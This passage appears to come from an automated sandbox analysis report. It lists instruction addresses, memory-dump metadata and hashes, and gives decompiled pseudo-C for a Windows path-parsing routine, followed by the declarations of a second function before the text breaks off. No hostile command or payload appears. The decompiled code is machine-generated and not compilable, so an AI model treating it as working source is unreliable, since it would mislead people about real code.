                          0x04945bd6
                          0x04945bdc
                          0x04945be0
                          0x04945be3
                          0x04945beb
                          0x04945bf2
                          0x04945bf8
                          0x04945bfe
                          0x04945c04
                          0x04945c0e
                          0x04945c18
                          0x04945c1f
                          0x04945c25
                          0x04945c2a
                          0x04945c2c
                          0x04945c32
                          0x04945c3a
                          0x04945c3f
                          0x04945c42
                          0x04945c48
                          0x04945c5b
                          0x04945c5b
                          0x04945c2c
                          0x04945cb7
                          0x04945cb9
                          0x04945cbf
                          0x04945cc2
                          0x04945cca
                          0x04945ccb
                          0x04945ccb
                          0x04945cd1
                          0x04945cd7
                          0x04945cda
                          0x04945ce1
                          0x04945ce4
                          0x04945ce7
                          0x04945ced
                          0x04945cf3
                          0x04945cf9
                          0x04945cff
                          0x04945d08
                          0x04945d0a
                          0x04945d0e
                          0x04945d10
                          0x00000000
                          0x00000000
                          0x04945d16
                          0x04945d1a
                          0x00000000
                          0x00000000
                          0x04945d20
                          0x04945d22
                          0x04945d25
                          0x04945d2f
                          0x04945d2f
                          0x04945d33
                          0x04945d3d
                          0x04945d49
                          0x04945d4b
                          0x00000000
                          0x00000000
                          0x04945d5a
                          0x04945d5d
                          0x04945d60
                          0x00000000
                          0x00000000
                          0x04945d66
                          0x04945d69
                          0x00000000
                          0x00000000
                          0x04945d6f
                          0x04945d6f
                          0x04945d73
                          0x04945d79
                          0x04945d7f
                          0x04945d86
                          0x04945d95
                          0x04945d98
                          0x04945dba
                          0x04945dcb
                          0x04945dce
                          0x04945dd3
                          0x04945dd6
                          0x04945dd8
                          0x04945de6
                          0x04945dec
                          0x04945dee
                          0x04945df1
                          0x04945df3
                          0x0494635a
                          0x0494635a
                          0x00000000
                          0x0494635a
                          0x04945dfe
                          0x04945e02
                          0x04945e05
                          0x04945e07
                          0x04945e10
                          0x04945e13
                          0x04945e1b
                          0x04945e1c
                          0x04945e21
                          0x04945e22
                          0x04945e23
                          0x04945e25
                          0x04945e2a
                          0x04945e2c
                          0x04945e2e
                          0x04945e36
                          0x04945e39
                          0x04945e42
                          0x04945e47
                          0x04945e4d
                          0x04945e54
                          0x04945e54
                          0x04945e54
                          0x04945e2e
                          0x04945e5c
                          0x04945e5f
                          0x04945e62
                          0x04945e64
                          0x04945e6b
                          0x04945e70
                          0x04945e7a
                          0x04945e7a
                          0x04945e7a
                          0x04945e6b
                          0x04945e7e
                          0x04945e7f
                          0x04945e7f
                          0x04945e81
                          0x04945e87
                          0x04945e8b
                          0x04945e8c
                          0x04945e8c
                          0x04945e8c
                          0x04945e9a
                          0x04945e9c
                          0x04945ea2
                          0x04945ea6
                          0x04945f50
                          0x04945f50
                          0x04945f57
                          0x04945f66
                          0x04945f66
                          0x04945f66
                          0x04945f68
                          0x04945f6a
                          0x049463d0
                          0x00000000
                          0x04945f70
                          0x04945f70
                          0x04945f91
                          0x04945f9c
                          0x04945f9e
                          0x04945fa4
                          0x04945fa6
                          0x0494638c
                          0x04946392
                          0x049463a1
                          0x049463a7
                          0x049463af
                          0x049463af
                          0x049463bd
                          0x049463d8
                          0x00000000
                          0x049463d8
                          0x04945fac
                          0x04945fb2
                          0x04945fb4
                          0x04945fbd
                          0x04945fc6
                          0x04945fce
                          0x04945fd4
                          0x04945fdc
                          0x04945fec
                          0x04945fed
                          0x04945fee
                          0x04945fef
                          0x04945ff9
                          0x04945ffa
                          0x04945ffb
                          0x04945ffc
                          0x04946000
                          0x04946004
                          0x04946012
                          0x04946012
                          0x04946018
                          0x04946019
                          0x0494601a
                          0x0494601b
                          0x0494601c
                          0x04946020
                          0x04946059
                          0x0494605c
                          0x04946061
                          0x04946061
                          0x04946022
                          0x04946022
                          0x04946022
                          0x04946025
                          0x0494602a
                          0x0494602b
                          0x04946031
                          0x04946037
                          0x04946038
                          0x0494603e
                          0x04946048
                          0x04946049
                          0x0494604a
                          0x0494604b
                          0x0494604c
                          0x0494604d
                          0x04946053
                          0x04946054
                          0x04946054
                          0x04946062
                          0x04946065
                          0x04946067
                          0x0494606a
                          0x04946070
                          0x04946075
                          0x04946076
                          0x04946081
                          0x04946087
                          0x04946095
                          0x04946099
                          0x0494609e
                          0x049460a4
                          0x049460ae
                          0x049460b0
                          0x049460b3
                          0x049460b6
                          0x049460b8
                          0x049460ba
                          0x049460ba
                          0x049460ba
                          0x049460ba
                          0x049460be
                          0x049460c0
                          0x049460c5
                          0x049460c5
                          0x049460c5
                          0x049460c6
                          0x049460cd
                          0x04946114
                          0x049460cf
                          0x049460cf
                          0x049460d4
                          0x049460d5
                          0x049460da
                          0x049460db
                          0x049460e1
                          0x049460e2
                          0x049460e8
                          0x049460f8
                          0x049460fd
                          0x049460fe
                          0x04946102
                          0x04946104
                          0x04946107
                          0x04946109
                          0x0494610b
                          0x0494610b
                          0x0494610b
                          0x0494610b
                          0x0494610f
                          0x0494610f
                          0x04946117
                          0x0494611a
                          0x0494611f
                          0x04946125
                          0x04946134
                          0x04946139
                          0x0494613f
                          0x04946146
                          0x04946148
                          0x0494614b
                          0x0494614d
                          0x0494614f
                          0x0494614f
                          0x0494614f
                          0x0494614f
                          0x04946153
                          0x04946159
                          0x04946159
                          0x0494615c
                          0x04946163
                          0x04946169
                          0x0494616c
                          0x04946172
                          0x04946181
                          0x04946186
                          0x04946187
                          0x0494618b
                          0x04946191
                          0x04946195
                          0x049461a3
                          0x049461bb
                          0x049461c0
                          0x049461c3
                          0x049461cc
                          0x049461d0
                          0x049461dc
                          0x049461de
                          0x049461e1
                          0x049461e4
                          0x049461e6
                          0x049461e8
                          0x049461e8
                          0x049461e8
                          0x049461e8
                          0x049461e6
                          0x049461ec
                          0x049461f3
                          0x04946203
                          0x04946209
                          0x0494620a
                          0x04946216
                          0x0494621d
                          0x04946227
                          0x04946241
                          0x04946246
                          0x0494624c
                          0x04946257
                          0x04946259
                          0x0494625c
                          0x0494625e
                          0x04946260
                          0x04946260
                          0x04946260
                          0x04946260
                          0x0494625e
                          0x04946264
                          0x04946267
                          0x04946269
                          0x04946315
                          0x04946315
                          0x0494631b
                          0x0494631e
                          0x04946324
                          0x04946327
                          0x0494632f
                          0x04946330
                          0x04946333
                          0x0494633a
                          0x0494633c
                          0x04946335
                          0x04946335
                          0x04946335
                          0x0494633f
                          0x04946342
                          0x0494634c
                          0x04946352
                          0x04946355
                          0x04946355
                          0x04946359
                          0x00000000
                          0x0494626f
                          0x04946275
                          0x04946275
                          0x04946278
                          0x0494627e
                          0x0494627e
                          0x04946281
                          0x04946287
                          0x0494628d
                          0x04946298
                          0x0494629c
                          0x049462a2
                          0x0494629e
                          0x0494629e
                          0x0494629e
                          0x049462a7
                          0x049462a7
                          0x049462aa
                          0x049462b0
                          0x049462f0
                          0x049462f0
                          0x049462f2
                          0x049462f8
                          0x049462fd
                          0x049462b2
                          0x049462b2
                          0x049462b2
                          0x049462b5
                          0x049462dd
                          0x049462e2
                          0x049462e5
                          0x049462b7
                          0x049462b8
                          0x049462bb
                          0x049462bd
                          0x049462c0
                          0x049462c4
                          0x049462cd
                          0x049462cd
                          0x049462c0
                          0x049462bb
                          0x049462b5
                          0x04946302
                          0x04946303
                          0x04946305
                          0x04946305
                          0x04946305
                          0x0494630c
                          0x0494630c
                          0x00000000
                          0x0494627e
                          0x04946269
                          0x04945eac
                          0x04945ebb
                          0x04945ebe
                          0x04945ecb
                          0x04945ecb
                          0x04945ece
                          0x04945ece
                          0x04945ed4
                          0x04945ed7
                          0x04945ed9
                          0x04945edb
                          0x04945edb
                          0x04945ee1
                          0x04945ee1
                          0x04945ee3
                          0x04945f20
                          0x04945f20
                          0x04945ee5
                          0x04945ee5
                          0x04945ee5
                          0x04945ee8
                          0x04945f11
                          0x04945f18
                          0x04945eea
                          0x04945eea
                          0x04945eed
                          0x04945ef2
                          0x04945ef8
                          0x04945efb
                          0x04945f0a
                          0x04945f0a
                          0x04945eed
                          0x04945ee8
                          0x04945f22
                          0x04945f28
                          0x00000000
                          0x00000000
                          0x04945f30
                          0x04945f31
                          0x04945f37
                          0x04945f3a
                          0x04945f3d
                          0x04945f44
                          0x00000000
                          0x00000000
                          0x00000000
                          0x04945f46
                          0x04945f48
                          0x04945f4d
                          0x00000000
                          0x04945f4d
                          0x04945dda
                          0x04945ddf
                          0x00000000
                          0x04945ddf
                          0x04945dd8
                          0x04945da7
                          0x04945da9
                          0x04945dac
                          0x04945dae
                          0x00000000
                          0x04945db4
                          0x04945db4
                          0x00000000
                          0x04945db4
                          0x04945dae
                          0x04945d88
                          0x04945d8d
                          0x04946363
                          0x04946369
                          0x0494636a
                          0x04946370
                          0x04946372
                          0x0494637a
                          0x0494637b
                          0x0494637d
                          0x00000000
                          0x00000000
                          0x0494637f
                          0x04946385
                          0x00000000
                          0x04946385
                          0x04945d38
                          0x04945d3b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x04945d3b
                          0x04945d27
                          0x04945d29
                          0x00000000
                          0x00000000
                          0x00000000
                          0x04946360
                          0x00000000
                          0x04946360
                          0x04945c10
                          0x04945c10
                          0x049463da
                          0x049463e5
                          0x049463e5

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0d9bb3c3b2f342807aab9a3e32a1db01242fd3df50b68d3c5e06ad6df9740ee
                          • Instruction ID: 266b3c5f3d8bf186faa2c1e548e7e92fd3a174f64c36238f45ec4a4bdccaabd8
                          • Opcode Fuzzy Hash: c0d9bb3c3b2f342807aab9a3e32a1db01242fd3df50b68d3c5e06ad6df9740ee
                          • Instruction Fuzzy Hash: C5428EB1A00259DFDB24CF68C880BA9B7B5FF89304F1585AAD94DEB241E734AD85CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04894120, Relevance: .4, Instructions: 444COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 92%
                          			E04894120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x496d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E048AF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04896E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04894620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04896E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M048945F8))) {
												case 0:
													_v568 = 0x4851078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x48511c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04894620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E048BF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E048BF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E048752A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0488EB70(1, 0x49679a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0488AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E048B95D0();
																			L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E048BB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E048B3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E048BB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                          0x04894128
                          0x04894135
                          0x0489413c
                          0x04894141
                          0x04894145
                          0x04894147
                          0x0489414e
                          0x04894151
                          0x04894159
                          0x0489415c
                          0x04894160
                          0x04894164
                          0x04894168
                          0x0489416c
                          0x0489417f
                          0x04894181
                          0x0489446a
                          0x0489446a
                          0x0489418c
                          0x04894195
                          0x04894199
                          0x04894432
                          0x04894439
                          0x0489443d
                          0x04894442
                          0x04894447
                          0x00000000
                          0x0489419f
                          0x048941a3
                          0x048941b1
                          0x048941b9
                          0x048941bd
                          0x048945db
                          0x048945db
                          0x00000000
                          0x048941c3
                          0x048941c3
                          0x048941ce
                          0x048941d4
                          0x048de138
                          0x048de13e
                          0x048de169
                          0x048de16d
                          0x048de19e
                          0x048de16f
                          0x048de16f
                          0x048de175
                          0x048de179
                          0x048de18f
                          0x048de193
                          0x00000000
                          0x048de199
                          0x00000000
                          0x048de199
                          0x048de193
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048941da
                          0x048941da
                          0x048941df
                          0x048941e4
                          0x048941ec
                          0x04894203
                          0x04894207
                          0x048de1fd
                          0x04894222
                          0x04894226
                          0x048de1f3
                          0x048de1f3
                          0x0489422c
                          0x0489422c
                          0x04894233
                          0x048de1ed
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x04894239
                          0x04894239
                          0x04894239
                          0x04894239
                          0x04894233
                          0x04894226
                          0x048941ee
                          0x048941ee
                          0x048941f4
                          0x04894575
                          0x048de1b1
                          0x048de1b1
                          0x00000000
                          0x0489457b
                          0x0489457b
                          0x04894582
                          0x048de1ab
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x04894588
                          0x04894588
                          0x0489458c
                          0x048de1c4
                          0x048de1c4
                          0x00000000
                          0x04894592
                          0x04894592
                          0x04894599
                          0x048de1be
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0489459f
                          0x0489459f
                          0x048945a3
                          0x048de1d7
                          0x048de1e4
                          0x00000000
                          0x048945a9
                          0x048945a9
                          0x048945b0
                          0x048de1d1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048945b6
                          0x048945b6
                          0x048945b6
                          0x00000000
                          0x048945b6
                          0x048945b0
                          0x048945a3
                          0x04894599
                          0x0489458c
                          0x04894582
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048941f4
                          0x0489423e
                          0x04894241
                          0x048945c0
                          0x048945c4
                          0x00000000
                          0x048945ca
                          0x048945ca
                          0x00000000
                          0x048de207
                          0x048de20f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048945d1
                          0x00000000
                          0x00000000
                          0x048945ca
                          0x00000000
                          0x04894247
                          0x04894247
                          0x04894247
                          0x04894249
                          0x04894249
                          0x04894249
                          0x04894251
                          0x04894251
                          0x04894257
                          0x0489425f
                          0x0489426e
                          0x04894270
                          0x0489427a
                          0x048de219
                          0x048de219
                          0x04894280
                          0x04894282
                          0x04894456
                          0x048945ea
                          0x00000000
                          0x048945f0
                          0x048de223
                          0x00000000
                          0x048de223
                          0x0489445c
                          0x0489445c
                          0x00000000
                          0x0489445c
                          0x00000000
                          0x04894288
                          0x0489428c
                          0x048de298
                          0x04894292
                          0x04894292
                          0x0489429e
                          0x048942a3
                          0x048942a7
                          0x048942ac
                          0x048de22d
                          0x048942b2
                          0x048942b2
                          0x048942b9
                          0x048942bc
                          0x048942c2
                          0x048942ca
                          0x048942cd
                          0x048942cd
                          0x048942d4
                          0x0489433f
                          0x0489433f
                          0x048942d6
                          0x048942d6
                          0x048942d9
                          0x048942dd
                          0x048942eb
                          0x048de23a
                          0x048942f1
                          0x04894305
                          0x0489430d
                          0x04894315
                          0x04894318
                          0x0489431f
                          0x04894322
                          0x0489432e
                          0x0489433b
                          0x0489433b
                          0x00000000
                          0x0489432e
                          0x048942eb
                          0x0489434c
                          0x0489434e
                          0x04894352
                          0x04894359
                          0x0489435e
                          0x04894361
                          0x0489436e
                          0x0489438a
                          0x0489438e
                          0x04894396
                          0x0489439e
                          0x048943a1
                          0x048943ad
                          0x048943bb
                          0x048943bb
                          0x048943ad
                          0x0489436e
                          0x048943bf
                          0x048943c5
                          0x04894463
                          0x04894463
                          0x048943ce
                          0x048943d5
                          0x048943d9
                          0x048943df
                          0x04894475
                          0x04894479
                          0x04894491
                          0x04894491
                          0x04894479
                          0x048943e5
                          0x048943eb
                          0x048943f4
                          0x048943f6
                          0x048943f9
                          0x048943fc
                          0x048943ff
                          0x048944e8
                          0x048944ed
                          0x048944f3
                          0x048de247
                          0x00000000
                          0x048944f9
                          0x04894504
                          0x04894508
                          0x0489450f
                          0x048de269
                          0x00000000
                          0x04894515
                          0x04894519
                          0x04894531
                          0x04894534
                          0x04894537
                          0x0489453e
                          0x04894541
                          0x0489454a
                          0x048de255
                          0x048de255
                          0x048de25b
                          0x048de25e
                          0x048de261
                          0x048de261
                          0x04894555
                          0x04894559
                          0x0489455d
                          0x048de26d
                          0x048de270
                          0x048de274
                          0x048de27a
                          0x048de27d
                          0x048de28e
                          0x048de28e
                          0x04894563
                          0x04894563
                          0x04894569
                          0x04894569
                          0x00000000
                          0x0489455d
                          0x0489450f
                          0x00000000
                          0x048944f3
                          0x048943ff
                          0x04894405
                          0x04894405
                          0x04894405
                          0x048942ac
                          0x0489428c
                          0x04894282
                          0x04894407
                          0x0489440d
                          0x048de2af
                          0x048de2af
                          0x04894413
                          0x04894413
                          0x00000000
                          0x048941d4
                          0x00000000
                          0x048941c3
                          0x048941bd
                          0x04894415
                          0x04894415
                          0x04894416
                          0x04894417
                          0x04894429
                          0x0489416e
                          0x0489416e
                          0x04894175
                          0x04894498
                          0x0489449f
                          0x048de12d
                          0x00000000
                          0x048de133
                          0x00000000
                          0x048de133
                          0x048944a5
                          0x048944a5
                          0x048944aa
                          0x00000000
                          0x048944bb
                          0x048944ca
                          0x048944d6
                          0x048944d7
                          0x048944d8
                          0x048944e3
                          0x048944e3
                          0x048944aa
                          0x0489417b
                          0x0489417b
                          0x0489417b
                          0x00000000
                          0x0489417b
                          0x04894175
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 57e0157e8283e1cf6f2b0abd1bc5fe8fbb257d6a02e477b2b87a1447315acb01
                          • Instruction ID: 9fb4075b9703fdcc0accec94d278eab0053b4fb52d6e75548528e926e7ecc614
                          • Opcode Fuzzy Hash: 57e0157e8283e1cf6f2b0abd1bc5fe8fbb257d6a02e477b2b87a1447315acb01
                          • Instruction Fuzzy Hash: 45F15F71609A118FDB14CF59C480A3AB7E1BF88B18F184E2EF486CB250E774ED56DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0488D5E0, Relevance: .4, Instructions: 353COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 87%
                          			E0488D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
